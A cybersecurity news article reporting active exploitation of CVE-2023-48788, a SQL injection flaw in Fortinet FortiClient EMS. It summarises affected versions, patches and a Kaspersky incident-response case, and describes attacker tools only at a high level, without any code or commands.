Cybersecurity researchers have uncovered active exploitation of a critical vulnerability in Fortinet’s FortiClient Enterprise Management Server (EMS), tracked as CVE-2023-48788.
This flaw, stemming from improper filtering of SQL commands, allows attackers to execute unauthorized code or commands via SQL injection. Despite the availability of patches, threat actors have been leveraging this vulnerability to infiltrate enterprise networks globally.
CVE-2023-48788 affects FortiClient EMS versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2, with a critical Common Vulnerability Scoring System (CVSS) score of 9.8.
It enables unauthenticated attackers to exploit the system by sending specially crafted data packets, potentially leading to remote code execution (RCE). The vulnerability was disclosed in March 2024, with patches released in versions 7.0.11 and 7.2.3.
FortiClient EMS serves as a centralized platform for managing endpoint security policies, often exposed to the internet for remote access purposes.
This exposure increases the risk of exploitation, allowing attackers to establish initial access, conduct reconnaissance, and deploy malicious payloads.
Free Webinar on Best Practices for API vulnerability & Penetration Testing: Free Registration
During an incident response in October 2024, Kaspersky’s Global Emergency Response Team (GERT) identified an attack on a Windows server using a vulnerable FortiClient EMS version (7.0.1).
The attackers gained access through SQL injection and deployed remote monitoring and management (RMM) tools like ScreenConnect and AnyDesk for persistence and lateral movement.
Artifacts revealed the use of tools such as mimikatz.exe for credential theft and HRSword.exe for defense evasion. Attackers also utilized native Windows binaries like certutil and curl to download additional payloads, furthering their control over compromised systems.
Evidence from system logs highlighted SQL injection attempts in FortiClient EMS logs (ems.log, sql_trace.log) and Microsoft SQL Server logs (ERRORLOG.X). These logs revealed unauthorized SQL queries enabling remote command execution via the xp_cmdshell function.
Threat intelligence indicates widespread exploitation of CVE-2023-48788 across multiple regions and industries. Attackers have been observed targeting vulnerable systems for data exfiltration, credential theft, and ransomware deployment. Notably, groups like Medusa ransomware have exploited this vulnerability for initial access.
Organizations using FortiClient EMS must urgently update to patched versions (7.0.11 or later, 7.2.3 or later) to mitigate risks. Additional security measures include:
This incident underscores the importance of timely patch management and robust cybersecurity practices to defend against evolving threats exploiting known vulnerabilities like CVE-2023-48788.
Europol has published a groundbreaking report titled “Leveraging Legitimacy: How the EU’s Most Threatening Criminal Networks… Read More
As 2024 comes to a close and we reach the midpoint of a decade that… Read More
Fortinet warns about Critical flaw in Wireless LAN Manager FortiWLM Pierluigi Paganini December 19, 2024… Read More
A critical security configuration in Azure Key Vault has been discovered, potentially allowing users with… Read More
BADBOX is a cybercriminal operation infecting Android devices like TV boxes and smartphones with malware… Read More
KEY SUMMARY POINTS Google Calendar Targeted: Hackers are exploiting Google Calendar’s features to send phishing… Read More